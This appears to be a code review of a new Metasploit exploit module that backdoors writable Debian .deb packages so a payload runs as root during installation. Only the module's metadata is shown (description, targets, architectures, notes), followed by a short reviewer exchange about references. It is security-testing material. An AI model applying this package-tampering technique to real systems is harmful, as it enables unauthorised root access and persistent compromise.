modules/exploits/linux/fileformat/debian_package_hijacker.rb

```diff
@@ -0,0 +1,346 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Post::File
+  include Msf::Post::Unix
+  include Msf::Post::Linux::System
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Debian Package File Command Injection',
+        'Description' => %q{
+          This module exploits the widespread lack of per-package signing
+          in the Debian package ecosystem. This means most .deb files are
+          vulnerable to manipulation if read-write access is available. By
+          injecting a payload into the package we can gain execution
+          as the root user. Custom dependencies can also be specified,
+          allowing us to install additional software.
+
+          This module can be run with a handler, but it is not enabled
+          by default.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Andrew Vanderbilt @ Vander Security',  # Original PoC
+          'Nick Cottrell <Rad10Logic>'            # PoC Additions
+        ],
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [
+          ARCH_CMD,
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+        'Targets' => [
+          ['Automatic', {}],
+          [
+            'Unix Command', {
+              'Arch' => ARCH_CMD
+            }
+          ],
+          [
+            'Linux dropper', {
+              'Arch' => [
+                ARCH_X86,
+                ARCH_X64,
+                ARCH_ARMLE,
+                ARCH_AARCH64,
+                ARCH_PPC,
+                ARCH_MIPSLE,
+                ARCH_MIPSBE
+              ]
+            }
+          ]
+        ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              stdapi_fs_mkdir
+              stdapi_fs_chmod
+            ]
+          }
+        },
+        'DefaultOptions' => { 'DisablePayloadHandler' => true },
+        'Privileged' => true,
+        'DisclosureDate' => '2023-03-25',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ], # Won't crash, but may fail parsing.
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], # The APT log and installed packages list will indicate any dependencies we inject. Also the shell log for the package scripts.
+          'Reliability' => [ REPEATABLE_SESSION ] # Infect as many pacakges as you want. Worst case the shell can't bind the port if multiple are active.
+        }
```

Comment:
Can we add a link to the resources/relevant PoCs and documentation that were used when implementing this module :+1:

Reply:
The only reference used was the Debian package spec. I pushed a commit adding a URL reference.